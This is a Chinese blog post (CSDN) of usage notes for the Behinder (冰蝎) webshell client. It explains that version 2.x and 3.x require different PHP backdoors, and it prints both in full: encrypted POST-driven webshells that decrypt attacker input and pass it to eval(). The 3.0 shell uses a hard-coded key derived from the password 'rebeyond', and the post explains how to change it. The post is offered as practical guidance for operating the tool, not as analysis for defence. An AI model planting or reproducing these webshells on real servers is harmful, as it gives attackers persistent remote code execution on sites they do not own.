冰蝎新老版本使用方式注意事项

最新推荐文章于 2023-06-30 22:20:16 发布
最新推荐文章于 2023-06-30 22:20:16 发布
阅读量2k 收藏 2
点赞数 2
分类专栏: 信息安全 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_29566629/article/details/123454537
版权

前言

今天遇到一个很奇怪的问题,冰蝎在使用过程中明明马上传的也正确,就是连接不上,后来才发现是新版3.x和旧版2.x使用的马不一样导致的结果,先记录如下(以PHP为例):
旧版的马:

<?php
@error_reporting(0);
session_start();
if (isset($_GET['pass']))
{
    $key=substr(md5(uniqid(rand())),16);
    $_SESSION['k']=$key;
    print $key;
}
else
{
    $key=$_SESSION['k'];
	$post=file_get_contents("php://input");
	if(!extension_loaded('openssl'))
	{
		$t="base64_"."decode";
		$post=$t($post."");
		
		for($i=0;$i<strlen($post);$i++) {
    			 $post[$i] = $post[$i]^$key[$i+1&15]; 
    			}
	}
	else
	{
		$post=openssl_decrypt($post, "AES128", $key);
	}
    $arr=explode('|',$post);
    $func=$arr[0];
    $params=$arr[1];
	class C{public function __construct($p) {eval($p."");}}
	@new C($params);
}
?>

新版3.0的马:

<?php
@error_reporting(0);
session_start();

if ($_SERVER['REQUEST_METHOD'] === 'POST')
{
    $key="e45e329feb5d925b";
	$_SESSION['k']=$key;
	$post=file_get_contents("php://input");
	if(!extension_loaded('openssl'))
	{
		$t="base64_"."decode";
		$post=$t($post."");
		
		for($i=0;$i<strlen($post);$i++) {
    			 $post[$i] = $post[$i]^$key[$i+1&15]; 
    			}
	}
	else
	{
		$post=openssl_decrypt($post, "AES128", $key);
	}
    $arr=explode('|',$post);
    $func=$arr[0];
    $params=$arr[1];
	class C{public function __invoke($p) {eval($p."");}}
    @call_user_func(new C(),$params);
}
?>

可以看到在旧版里,使用的是GET方式来获取参数,新版的则是利用了匹配机制,"e45e329feb5d925b"是rebeyond md5值得前16位,所以连接时要使用rebeyond作为密码。
如果想修改这个密码的话:
在这里插入图片描述
把密码改一下就行。

qq_29566629
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
使用MOS管的注意事项
01-20
MOS管由多数载流子参与导电,也称为单极型晶体管。它属于电压控制型半导体器件。具有输入电阻高(10^7~10^12Ω)、噪声小、功耗低、动态范围大、易于集成、没有二次击穿现象、安全工作区域宽等优点,现已成为双极型晶体管和功率晶体管的强大竞争者。 所有?MOS?集成电路?(包括?P?沟道?MOS,?N?沟道?MOS,?互补?MOS?—?CMOS?集成电路)?都有一层绝缘栅,以防止电压击穿。一般器件的绝缘栅氧化层的厚度大约是?25nm?50nm?80nm?三种。在集成电路高阻抗栅前面还有电阻——二极管网络进行保护,虽然如此,器件内的保护网络还不足以免除对器件的静电损害(ESD),实验指出,在高电
FFT相关原理及使用注意事项
01-19
在信号分析与处理中,频谱分析是重要的工具。FFT(Fast Fourier Transform,快速傅立叶变换)可以将时域信号转换至频域,以获得信号的频率结构、幅度、相位等信息。该算法在理工科课程中都有介绍,众多的仪器或软件亦集成此功能。FFT实用且高效,相关原理与使用注意事项也值得好好学习。   一、何为FFT   对于模拟信号的频谱分析,首先得使用ADC(模拟数字转换器)进行采样,转换为有限序列,        其非零值长度为N,经DFT(离散傅立叶变换)即可转化为频域。DFT变换式为:   在上式中,N点序列的DFT需要进行N2
冰蝎 连接木马到反弹shell拿到权限全过程
hackzkaq的博客
11-25 1万+
一.冰蝎简介 什么是冰蝎冰蝎”是一个动态二进制加密网站管理客户端。 在实战中一代webshell管理工具“菜刀”的流量特征非常明显,很容易就被安全设备检测到。 基于流量加密的webshell变得越来越多,“冰蝎”在此应运而生。 一.冰蝎连接getshell方法 1.加入冰蝎特有的的PHP木马,(注意:使用一句话木马无法连接冰蝎),连接密码可以随意改动格式为md5 32为的前16为值 md5(admin)[0-16] <?php @errorreporting(0); session_start()
冰蝎-Webshell管理工具
weixin_66717977的博客
06-30 4683
冰蝎超详解,新手食用
ubuntu安装docker,vulhub靶场 / 冰蝎连接
赵花花08042的博客
08-20 550
Ubuntu安装docker 先查看版本 uname -a 直接安装是不行的,一般使用ubuntu系统安装需要先更新 直接安装一般会爆这个错误 ↓ 这个安装博文 写的还挺细,不过我是按照官网步骤的 在网上看了一堆,还是官网的安装步骤最靠谱 https://docs.docker.com/engine/install/ubuntu/#prerequisites 安装docker-compose sudo apt install docker-compose 下载vunlhub 参考 博文 官网 ht
upload-labs 01-03
weixin_39514626的博客
06-17 707
1、pass01 创建upload文件夹后,尝试上传一个php文件。得到提示 js判断 首先判断是前端还是后端验证,结果关闭js后上传成功。 同时,F12查看发现了checkFile()函数。它的作用是检查某一文件是否存在。 查看源码, 对于判断文件类型的解释,参数.indexof(x,y) indexof从头到尾检索参数中的字符串,看看它的子串中是否有和字符串x一样的,y规定开始检索的...
冰蝎(Behinder)jar无法打开(或用bat打开后无法成功连接)解决方法
hunter__one的博客
12-04 2337
冰蝎(Behinder)jar无法打开(或用bat打开后无法成功连接)解决方法
冰蝎3.0 页面存在,但是无法获取密钥
weixin_39811856的博客
08-18 7781
下载链接:https://github.com/rebeyond/Behinder/releases 此次改版较大,更新日志: 我在尝试时PHP马时,一直都在报错: 于是我去github下查看issues 结合别人的回复,我查看自己php版本:5.7 使用docker搭建apache+php7.0 https://www.jianshu.com/p/81ad5fe91866 连接成功 ...
upload-labs 1~3教学
weixin_52685785的博客
02-24 120
pass—1,pass—2,pass—3
冰蝎Behinder双击无法打开解决办法
weixin_67813445的博客
02-02 1382
冰蝎Behinder双击无法打开的具体解决办法
webshell连接工具冰蝎2.0,后面有三点零的,找一找再发
12-28
做渗透的,不支持恶意攻击
UPS电源的使用注意事项.pdf
04-01
UPS电源的使用注意事项.pdfUPS电源的使用注意事项.pdfUPS电源的使用注意事项.pdfUPS电源的使用注意事项.pdfUPS电源的使用注意事项.pdf
端子连接器的使用注意事项
10-21
以下介绍使用JST"端子/ 连接器"时的一般注意事项:  1.通用使用注意事项  ● 生产"端子/ 连接器"的目的在于接通电和电气信号。  请勿将其用于以向"端子/ 连接器"的结合(接触部)施加机械力为前提的构件或构件...
变频器维护和使用注意事项.pdf
07-14
变频器维护和使用注意事项.pdf变频器维护和使用注意事项.pdf变频器维护和使用注意事项.pdf变频器维护和使用注意事项.pdf变频器维护和使用注意事项.pdf变频器维护和使用注意事项.pdf
linux中赋予普通用户root权限的三种方式
热门推荐
qq_29566629的博客
03-28 4万+
前言 在成功拿下一个服务器并提权成为root用户以后,为了减少root用户使用时间从而减少被网站管理员发现的概率,就需要新建一个普通用户,并赋予其完全的管理员权限,有以下三种常见的方式 三种方式 1. 直接修改/etc/passwd文件 /etc/passwd文件里的第三列是UID,这个值为0的话就表示这个用户具有完全的管理员权限,所以新建一个用户后只需要把这个值置为0就可以: 如图的ning这个账户,只是更改了UID,现在验证一下是否具有了root权限: 可以看到,能打开/etc/shadow这个文件
wireshark使用记录(三种过滤方式
qq_29566629的博客
02-04 8033
三种过滤方式
CTF中压缩包的常见套路
qq_29566629的博客
02-15 6159
识别十六进制字符串的特殊字符:504B0304表示开始,504B0506表示结束(这里有一个补充知识点:把文件命名成什么文件类型,计算机就从什么特征头来进行识别,比如zip就从504B0304开始识别,从504B0506结束),值得注意的是对于txt文件,不存在任何文件头。 伪加密 文件修复 有可能存在文件头故意写错的情况: 这时候改过来就行:504B0304 冗余信息拼接 ZIP压缩文件目录结束标识位为“504B0506”,且通常带有18字节(在预备知识中我们将每个偏移量视作一位..
CTF 刷题记录(一) 白云新闻搜索(手动与自动化SQL注入)
qq_29566629的博客
07-27 5896
题目 给出的靶机如下: 解题思路 首先判断这是考察哪个知识点,只有一个输入框,题目中又说到入侵,首先考虑sql注入,下面介绍手工和自动化注入两种方式 (1)手工注入 先随便输入几个值,发现只有在值等于“内容”时有返回结果,其他关键字均没有结果,但是会有会先如下: 用“ ’ ”来探测是否能接受特殊字符以及是否存在注入点,结果如图: 很显然,存在前台的js代码在控制输入的字符,找到这个网页的js代码,如下: 代码把所有的特殊字符都换成了空字符。 现在要做的就是就是先把这个网站的js代码停用,如下图:
kali(linux) smbclient用法
qq_29566629的博客
03-27 5428
Smb一般作为文件共享服务器,专门提供Linux与Windows之间的传送文件服务,在kali linux中提供了专用的客户端smbclient 下面就介绍一下其简单用法 如图:-U 后面跟用户名和密码,如果没有则不需要加-U 如图就可以使用linux的ls等命令进行操作了。 3. get命令用来下载 ...
IAR使用注意事项
最新发布
08-29
IAR是一种常用的集成开发环境,用于嵌入式系统的开发。在使用IAR进行华大芯片HC32F460的IAP在线编程或在线升级程序时,需要注意以下几点: 1. 确保使用的IAR版本与芯片的支持版本匹配。不同版本的IAR可能存在兼容性问题,因此确保选择正确的版本是非常重要的。 2. 在进行在线编程或升级之前,确保已经正确配置好芯片的引导模式。引导模式的设置可能包括引导方式、引导源选择等。根据具体的芯片手册和应用需求,正确配置引导模式是在线编程的先决条件。 3. 在使用IAR进行在线编程时,需要将目标设备正确连接到计算机。通过JTAG、SWD等调试接口,将芯片与开发工具连接起来,以便进行在线编程或升级。 4. 在进行在线编程或升级之前,需要确保目标设备的固件已经合理备份。在线编程可能会对设备的原始固件进行修改,为了防止数据丢失或损坏,备份固件是一个很好的习惯。 5. 在进行在线编程或升级时,要确保所使用的IAR工程正确设置了相关的编译和链接选项。这些选项包括目标地址、存储器映射、编译优化等。正确的设置可以确保生成的固件与目标设备匹配。 总之,使用IAR进行华大芯片HC32F460的IAP在线编程或在线升级程序时,需要注意软件和硬件的兼容性、引导模式的配置、设备的连接、固件的备份和编译选项的设置等方面的注意事项。这些注意事项可以确保在线编程的顺利进行。<span class="em">1</span> #### 引用[.reference_title] - *1* [基于IAR的HC32F460 IAP在线升级注意事项](https://download.csdn.net/download/star6112/86930335)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值